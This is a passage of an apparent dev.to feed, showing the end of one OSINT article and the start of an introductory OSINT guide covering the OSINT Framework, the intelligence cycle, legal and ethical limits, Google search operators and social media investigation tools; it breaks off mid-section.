&lt;td&gt;🚢 &lt;strong&gt;Marine Traffic&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.marinetraffic.com/" rel="noopener noreferrer"&gt;marinetraffic.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Communities and Learning
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🔍 &lt;strong&gt;Bellingcat&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.bellingcat.com/" rel="noopener noreferrer"&gt;bellingcat.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;💬 &lt;strong&gt;r/OSINT&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.reddit.com/r/OSINT/" rel="noopener noreferrer"&gt;reddit.com/r/OSINT&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📰 &lt;strong&gt;DataJournalism.com&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://datajournalism.com/" rel="noopener noreferrer"&gt;datajournalism.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  About the Author
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;I'm passionate about open-source intelligence and the ways we can use publicly available information to uncover truth and promote transparency. Follow me for more OSINT guides and techniques.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  📌 Tags
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;OSINT&lt;/code&gt; &lt;code&gt;Geolocation&lt;/code&gt; &lt;code&gt;EnvironmentalAnalysis&lt;/code&gt; &lt;code&gt;InvestigativeJournalism&lt;/code&gt; &lt;code&gt;OpenSourceIntelligence&lt;/code&gt; &lt;code&gt;DataJournalism&lt;/code&gt; &lt;code&gt;SatelliteImagery&lt;/code&gt; &lt;code&gt;GeospatialAnalysis&lt;/code&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;⚠️ **Disclaimer:&lt;/em&gt;* The tools and techniques described in this guide are intended for ethical and legal use only. Always respect privacy, platform terms of service, and applicable laws when conducting OSINT investigations.*&lt;/p&gt;




&lt;p&gt;Reference: &lt;a href="https://freeosint.github.io/pages/training.html" rel="noopener noreferrer"&gt;FreeOSINT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>infosec</category>
      <category>science</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The Ultimate Guide to OSINT: Framework, Ethics, Tools &amp; Techniques (OSINT Series Part 1)</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sat, 20 Jun 2026 08:12:21 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/the-ultimate-guide-to-osint-framework-ethics-tools-techniques-part-1-2mli</link>
      <guid>https://dev.to/hitanshugedam/the-ultimate-guide-to-osint-framework-ethics-tools-techniques-part-1-2mli</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;Open Source Intelligence (OSINT) has emerged as a crucial discipline in the digital era, driven by the rapid growth of information available on the internet. Today, the internet grows by approximately 20-30% each year, with a significant portion consisting of open source content such as social media posts, public documents, and multimedia files. OSINT involves collecting, analyzing, and interpreting publicly available data to achieve specific investigative objectives, serving everyone from intelligence agencies and law enforcement to ethical hackers, journalists, and academic researchers.&lt;/p&gt;

&lt;p&gt;In this comprehensive guide, we'll explore the OSINT framework, ethical considerations, essential tools, and practical techniques that will help you become a more effective OSINT practitioner.&lt;/p&gt;




&lt;h2&gt;
  
  
  1) The OSINT Framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is the OSINT Framework?
&lt;/h3&gt;

&lt;p&gt;The OSINT Framework is a centralized, web-based directory that organizes open-source intelligence tools into easily navigable categories. Created by security researcher Justin Nordine, it functions more like a roadmap than a single tool, connecting users with the best resources across multiple categories to support investigations in criminal investigations, corporate security, executive protection, cybersecurity, journalism, and law enforcement.&lt;/p&gt;

&lt;p&gt;The framework's modular design allows users to explore different categories pertaining to particular types of data, such as username checks, domain name hunting, or location-based data, enabling them to tailor their approach based on their specific needs. Being open-source means the framework is freely accessible to anyone interested in utilizing it for educational or professional purposes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features of the OSINT Framework
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Resource&lt;/strong&gt;: Vast collection of tools and resources organized hierarchically, ranging from search engines and social media analysis tools to data breach databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular Design&lt;/strong&gt;: Users can explore different categories that pertain to particular types of data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Accessibility&lt;/strong&gt;: Free and open to anyone interested in OSINT work&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Up-to-date Information&lt;/strong&gt;: Community-driven enhancements keep the framework current and relevant&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration Ready&lt;/strong&gt;: Many tools can be incorporated into broader intelligence platforms or workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  OSINT Framework Categories
&lt;/h3&gt;

&lt;p&gt;The OSINT Framework organizes its collection into clearly defined categories, each targeting a specific data type or investigative focus:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example Resources&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Username&lt;/td&gt;
&lt;td&gt;Find profiles or linked accounts based on a username&lt;/td&gt;
&lt;td&gt;Namechk, KnowEm&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Email Address&lt;/td&gt;
&lt;td&gt;Trace emails to discover breaches or ownership&lt;/td&gt;
&lt;td&gt;HaveIBeenPwned, EmailRep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain Name&lt;/td&gt;
&lt;td&gt;Gather WHOIS, DNS, and site-related info&lt;/td&gt;
&lt;td&gt;DomainTools, ViewDNS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IP and MAC Address&lt;/td&gt;
&lt;td&gt;IP location and device fingerprinting&lt;/td&gt;
&lt;td&gt;IPinfo, Wireshark&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Images/Videos/Docs&lt;/td&gt;
&lt;td&gt;Reverse search or metadata analysis&lt;/td&gt;
&lt;td&gt;Google Reverse Image, FotoForensics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Social Networks&lt;/td&gt;
&lt;td&gt;Profile search and data analytics&lt;/td&gt;
&lt;td&gt;Social Searcher, Twint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;People Search Engines&lt;/td&gt;
&lt;td&gt;Find publicly available info on individuals&lt;/td&gt;
&lt;td&gt;Pipl, Spokeo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public Records&lt;/td&gt;
&lt;td&gt;Access to government/public records&lt;/td&gt;
&lt;td&gt;SearchSystems, PACER&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Business Records&lt;/td&gt;
&lt;td&gt;Find business registration and ownership info&lt;/td&gt;
&lt;td&gt;OpenCorporates, Crunchbase&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transportation&lt;/td&gt;
&lt;td&gt;Info on flights, ships, and vehicles&lt;/td&gt;
&lt;td&gt;FlightRadar24, MarineTraffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Geolocation Tools/Maps&lt;/td&gt;
&lt;td&gt;Identify location using maps and geotags&lt;/td&gt;
&lt;td&gt;Google Maps, EXIF Viewer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Archives&lt;/td&gt;
&lt;td&gt;Explore historical versions of web pages&lt;/td&gt;
&lt;td&gt;Wayback Machine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Metadata&lt;/td&gt;
&lt;td&gt;Extract hidden data from files&lt;/td&gt;
&lt;td&gt;Metagoofil, FOCA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dark Web&lt;/td&gt;
&lt;td&gt;Access and monitor darknet markets&lt;/td&gt;
&lt;td&gt;Tor Browser, Ahmia&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat Intelligence&lt;/td&gt;
&lt;td&gt;Threat feeds and indicators&lt;/td&gt;
&lt;td&gt;AlienVault OTX&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  2) The OSINT Cycle
&lt;/h2&gt;

&lt;p&gt;The OSINT cycle, also known as the intelligence cycle, describes the process of transforming raw data into finished intelligence for decision-makers to support action. This framework helps practitioners organize their approach and avoid missing critical information. The intelligence cycle consists of six interconnected phases:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Planning &amp;amp; Direction
&lt;/h3&gt;

&lt;p&gt;This phase involves defining areas of interest, preparing a collection plan, setting priorities, and developing an appropriate intelligence architecture. Intelligence requirements must align with and support the goals and activities of the organization or client. As one investigator aptly noted: "Give me six hours to chop down a tree and I will spend the first four sharpening the axe" — this stage is critical because it initiates the entire intelligence cycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Define objectives, requirements, and scope of the investigation&lt;/li&gt;
&lt;li&gt;Identify the best sources of information&lt;/li&gt;
&lt;li&gt;Prepare a collection plan&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. Collection (Gathering)
&lt;/h3&gt;

&lt;p&gt;In this phase, relevant data is retrieved from publicly available open sources based on the target objective. The internet serves as a primary source due to the vast amount of accessible information. To begin the search, at least one data point about the target is required — an email address, username, real name, location, or IP address.&lt;/p&gt;

&lt;p&gt;The data obtained through a single technique serve as input for generating additional data with other techniques. From this stage onward, the entire intelligence creation process is initiated.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Gather information from various sources&lt;/li&gt;
&lt;li&gt;Use multiple search engines and techniques&lt;/li&gt;
&lt;li&gt;Document collection methodology&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Processing (Data Enrichment)
&lt;/h3&gt;

&lt;p&gt;This phase, also referred to as data enrichment, involves transforming collected raw data into understandable and valuable information. On their own, the data are not useful and must be interpreted to derive initial facts through preliminary analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filter, validate, and organize collected data&lt;/li&gt;
&lt;li&gt;Extract relevant data from raw text using NLP techniques&lt;/li&gt;
&lt;li&gt;Perform feature extraction and entity recognition&lt;/li&gt;
&lt;li&gt;Distinguish signals from noise&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4. Analysis &amp;amp; Production
&lt;/h3&gt;

&lt;p&gt;This phase involves knowledge extraction and inference. The information generated in the previous phase is used as input for advanced inference algorithms such as pattern recognition, profiling behavior, value prediction, and event correlation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Examine processed information to identify patterns, relationships, and insights&lt;/li&gt;
&lt;li&gt;Look for trends and correlations&lt;/li&gt;
&lt;li&gt;Map relationships between individuals, organizations, or locations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  5. Dissemination &amp;amp; Integration
&lt;/h3&gt;

&lt;p&gt;In this phase, intelligence is delivered to the consumer and put to use. The method of dissemination is determined by the client's needs and the criticality of intelligence. Intelligence personnel are responsible for ongoing support even after delivery, aiding in decision-making and responding to follow-up questions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Present findings in a clear, actionable format&lt;/li&gt;
&lt;li&gt;Tailor reports to the audience&lt;/li&gt;
&lt;li&gt;Include methodology and key findings&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Evaluation &amp;amp; Feedback
&lt;/h3&gt;

&lt;p&gt;Evaluation and feedback occur continuously throughout all stages. This phase requires ongoing dialogue between all intelligence personnel involved in production and intelligence consumers. The goal is to identify issues as early as possible to minimize information gaps and mitigate capability shortfalls.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key activities&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Evaluate the process and results&lt;/li&gt;
&lt;li&gt;Identify which sources were most valuable&lt;/li&gt;
&lt;li&gt;Improve future investigations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Iterative Nature of the OSINT Cycle
&lt;/h3&gt;

&lt;p&gt;The intelligence cycle is an iterative process in which data is continuously fed into the system to produce a sequence of ongoing results. The process begins with data collection, followed by data enrichment and knowledge inference, and then loops back to the initial stage, repeating in a cyclical manner. Findings at any stage might prompt a return to earlier stages to refine the approach or gather additional information.&lt;/p&gt;

&lt;h3&gt;
  
  
  Example: OSINT Cycle in Action
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario&lt;/strong&gt;: Investigating a company for potential business partnership&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Planning&lt;/strong&gt;: Define what you need to know (financial stability, reputation, leadership)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Collection&lt;/strong&gt;: Gather information from company website, news articles, financial reports, social media&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Processing&lt;/strong&gt;: Organize information chronologically, verify facts across multiple sources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Analysis&lt;/strong&gt;: Identify patterns in company growth, leadership changes, market positioning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dissemination&lt;/strong&gt;: Create a report with key findings and recommendations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feedback&lt;/strong&gt;: Review which sources were most valuable for future investigations&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  3) OSINT Ethics and Legal Considerations
&lt;/h2&gt;

&lt;p&gt;The legal landscape governing OSINT activities extends far beyond the notion of "public availability." The erroneous presumption that publicly accessible information exists free from statutory constraints constitutes one of the most significant compliance risks facing practitioners today.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Legal Frameworks
&lt;/h3&gt;

&lt;p&gt;OSINT operations must comply with multiple, overlapping legal frameworks that impose substantive limitations on data collection and processing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GDPR (EU)&lt;/strong&gt;: Sets strict rules on collecting and handling personal data, even when that data is publicly visible. Teams must justify purpose, minimize use, and apply safeguards.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CCPA/CPRA (California)&lt;/strong&gt;: Regulates how organizations gather and process personal information about California residents, including data found through open sources.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Computer Fraud and Abuse Act (US)&lt;/strong&gt;: Limits unauthorized access to systems or protected data. OSINT remains lawful only when collection stays within public, intentionally available information.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Platform-specific terms and regional privacy laws&lt;/strong&gt;: Many platforms restrict automated scraping or bulk data collection. Local privacy frameworks may also affect how long data can be stored or how it can be shared.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Key Ethical Considerations
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Respect for privacy and personal boundaries&lt;/li&gt;
&lt;li&gt;Adherence to terms of service of platforms and websites&lt;/li&gt;
&lt;li&gt;Awareness of copyright and intellectual property rights&lt;/li&gt;
&lt;li&gt;Consideration of potential harm from information disclosure&lt;/li&gt;
&lt;li&gt;Transparency about methods and limitations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example: Ethical Dilemma
&lt;/h3&gt;

&lt;p&gt;You find a public social media profile that contains potentially valuable information for your investigation. The information is technically public, but it's clear the person didn't intend for it to be widely accessible.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ethical questions to consider&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is this information truly necessary for your investigation?&lt;/li&gt;
&lt;li&gt;Could using this information cause harm to the individual?&lt;/li&gt;
&lt;li&gt;Would you be comfortable explaining your methods to others?&lt;/li&gt;
&lt;li&gt;Are there alternative sources for this information?&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Legal Considerations in Practice
&lt;/h3&gt;

&lt;p&gt;The study of OSINT tools and techniques highlights that "the future of OSINT depends not only on technological advancement, but also on strong legal and ethical responsibility to mitigate risks of liability and reputational harm".&lt;/p&gt;

&lt;p&gt;When in doubt, err on the side of caution and respect for privacy. Developing a personal ethical framework for OSINT work is essential for responsible practice.&lt;/p&gt;




&lt;h2&gt;
  
  
  4) OSINT Tools and Resources
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Building Your OSINT Toolkit
&lt;/h3&gt;

&lt;p&gt;A well-rounded OSINT toolkit should include tools from several essential categories:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Principles&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Purpose-Driven Selection&lt;/strong&gt;: Choose tools based on your specific investigation needs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Redundancy&lt;/strong&gt;: Have multiple tools that can accomplish similar tasks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Awareness&lt;/strong&gt;: Consider the security implications of each tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Learning Curve&lt;/strong&gt;: Balance capability with ease of use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration&lt;/strong&gt;: Consider how tools work together in your workflow&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Search and Discovery Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  General Search Engines
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google&lt;/strong&gt;: Most powerful search engine when used with advanced operators&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing&lt;/strong&gt;: Microsoft's search engine, sometimes indexes content Google misses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DuckDuckGo&lt;/strong&gt;: Privacy-focused search engine that doesn't track users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Yandex&lt;/strong&gt;: Russian search engine with strong image search capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Baidu&lt;/strong&gt;: Chinese search engine useful for investigations in Asia&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Specialized Search Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Dorking&lt;/strong&gt;: Using advanced Google search operators for precise queries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shodan&lt;/strong&gt;: Search engine for internet-connected devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Archive.org (Wayback Machine)&lt;/strong&gt;: Access to archived versions of websites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Dataset Search&lt;/strong&gt;: Search engine for datasets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Scholar&lt;/strong&gt;: Search engine for academic papers&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Basic Search Operators
&lt;/h3&gt;

&lt;p&gt;Search operators form the foundation of advanced searching and can be combined to create highly specific queries:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operator&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;" "&lt;/code&gt; (quotation marks)&lt;/td&gt;
&lt;td&gt;Search for an exact phrase&lt;/td&gt;
&lt;td&gt;&lt;code&gt;"open source intelligence"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-&lt;/code&gt; (minus sign)&lt;/td&gt;
&lt;td&gt;Exclude a term&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint -government&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;OR&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Search for either term&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint OR "open source intelligence"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;AND&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Search for both terms&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint AND ethics&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;( )&lt;/code&gt; (parentheses)&lt;/td&gt;
&lt;td&gt;Group operators&lt;/td&gt;
&lt;td&gt;&lt;code&gt;(osint OR intelligence) AND tools&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To find information about Python (the programming language) while excluding results about snakes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;programming&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;snake&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Google-Specific Operators
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operator&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;site:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Limit results to a specific website or domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;site:example.com osint&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;filetype:&lt;/code&gt; / &lt;code&gt;ext:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Find specific file types&lt;/td&gt;
&lt;td&gt;&lt;code&gt;filetype:pdf "osint methodology"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;intitle:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the title&lt;/td&gt;
&lt;td&gt;&lt;code&gt;intitle:osint tools&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;inurl:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;inurl:security osint&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;intext:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages with specific words in the content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;intext:"social media investigation"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;after:&lt;/code&gt; / &lt;code&gt;before:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Limit results to a specific time period&lt;/td&gt;
&lt;td&gt;&lt;code&gt;osint after:2022-01-01 before:2022-12-31&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;related:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find websites related to a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;related:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;cache:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;View Google's cached version of a page&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cache:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;info:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Get information about a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;info:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;link:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Find pages that link to a specific URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;link:example.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;*&lt;/code&gt; (wildcard)&lt;/td&gt;
&lt;td&gt;Replace unknown words in a phrase&lt;/td&gt;
&lt;td&gt;&lt;code&gt;"best * for osint"&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Advanced Google Operators
&lt;/h3&gt;

&lt;p&gt;For sophisticated OSINT investigations, the &lt;code&gt;AROUND(n)&lt;/code&gt; operator is particularly powerful. It allows you to find documents where specific terms appear close to each other, indicating a stronger relationship between concepts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To find recent discussions about cybersecurity threats in the context of OSINT:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"cybersecurity threats" AROUND(3) osint after:2023-01-01
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Social Media Investigation Tools
&lt;/h3&gt;

&lt;p&gt;Social media platforms contain vast amounts of valuable information for OSINT investigations.&lt;/p&gt;

&lt;h4&gt;
  
  
  Cross-Platform Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Social Searcher&lt;/strong&gt;: Search across multiple social platforms without logging in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hootsuite&lt;/strong&gt;: Monitor multiple social networks from one dashboard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mention&lt;/strong&gt;: Track mentions across social media and the web&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Brand24&lt;/strong&gt;: Social media monitoring and analytics tool&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Twitter/X Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;TweetDeck&lt;/strong&gt;: Advanced Twitter dashboard for monitoring multiple feeds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Twint&lt;/strong&gt;: Twitter scraping tool that doesn't use Twitter's API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Twitonomy&lt;/strong&gt;: Detailed Twitter analytics and insights&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Foller.me&lt;/strong&gt;: Twitter analytics focused on account behavior&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Instagram Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Instaloader&lt;/strong&gt;: Download Instagram profiles, hashtags, and locations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ImgInn&lt;/strong&gt;: View Instagram profiles without an account&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Picuki&lt;/strong&gt;: Instagram editor and viewer&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Facebook Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Who Posted What&lt;/strong&gt;: Search Facebook posts by date range and keywords&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;StalkScan&lt;/strong&gt;: Find information that might be hidden but publicly available&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  People Search and Background Check Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
